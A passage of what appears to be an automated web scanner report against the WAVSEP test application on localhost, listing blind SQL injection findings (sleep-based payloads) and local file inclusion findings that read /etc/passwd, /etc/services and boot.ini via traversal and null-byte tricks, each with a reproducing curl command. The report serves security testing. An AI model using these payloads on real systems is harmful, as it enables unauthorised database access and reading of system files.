curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp?transactionDate=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithDifferent200Responses.jsp?transactionId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithDifferent200Responses.jsp?transactionId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp?msgId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp?msgId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithDifferent200Responses.jsp?minBalanace=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithDifferent200Responses.jsp?minBalanace=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithDifferent200Responses.jsp?msgid=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithDifferent200Responses.jsp?msgid=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp?username=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp?username=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp

Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=sleep%287%29%231"
Solutions
To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, user input must be escaped or filtered or parameterized statements must be used.
References


File Handling

Description
This attack is also known as Path or Directory Traversal, its aim is the access to files and directories that are stored outside the web root folder. The attacker tries to explore the directories stored in the web server. The attacker uses some techniques, for instance, the manipulation of variables that reference files with 'dot-dot-slash (../)' sequences and its variations to move up to root directory to navigate through the file system.

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
